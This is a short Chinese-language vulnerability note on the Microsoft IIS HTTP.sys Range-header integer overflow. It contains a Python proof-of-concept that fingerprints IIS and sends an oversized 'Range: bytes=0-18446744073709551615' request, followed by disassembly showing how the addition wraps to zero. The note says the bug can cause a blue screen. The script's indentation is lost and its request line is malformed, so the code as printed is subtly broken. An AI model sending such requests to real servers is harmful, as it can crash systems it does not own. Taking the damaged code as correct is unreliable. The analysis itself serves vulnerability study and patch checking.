现在最多造成蓝屏
POC
import socket
import random
ipAddr ="WebSite"
hexAllFfff ="18446744073709551615"
count=0
req1 ="GET/ HTTP/1.0\r\n\r\n"
req ="GET/ HTTP/1.1\r\nHost: stuff\r\nRange: bytes="+str(count)+"-"+ hexAllFfff +"\r\n\r\n"
print "[*] Audit Started"
client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client_socket.connect((ipAddr, 80))
client_socket.send(req1)
boringResp = client_socket.recv(1024)
if "Microsoft" not in boringResp:
print "[*] Not IIS"
exit(0)
client_socket.close()
client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client_socket.connect((ipAddr, 80))
client_socket.send(req)
goodResp = client_socket.recv(1024)
if "Requested Range Not Satisfiable" in goodResp:
print "[!!] Looks VULN"
elif " The request has an invalid header name" in goodResp:
print "[*] Looks Patched"
else:
print "[*] Unexpected response, cannot discern patch status"
print goodResp
**
**
漏洞原理:
HTTP.sys 在处理内核缓存数据时,
**
**
8a8b2112 56 push esi
8a8b2113 6a00 push 0
8a8b2115 2bc7 sub eax,edi
8a8b2117 6a01 push 1
8a8b2119 1bca sbb ecx,edx
8a8b211b 51 push ecx
8a8b211c 50 push eax
8a8b211d e8bf69fbff call HTTP!RtlULongLongAdd (8a868ae1); here**
**
**
**
eax1 = eax - edi
ecx1 = ecx - edx
RtlULongLongAdd (eax1, ecx1)
**
**
其中 eax1 与 ecx1 是处理 HTTP 请求中
Range: bytes="+offsetlow+"-"+offsethigh+"\r\n\r\n"
当offsetlow = 0 ,offsethigh= 0xFFFFFFFFFFFFFFFF
时经过 RtlULongLongAdd 操作
0xFFFFFFFFFFFFFFFF+ 0 + 1 = 0 造成整数溢出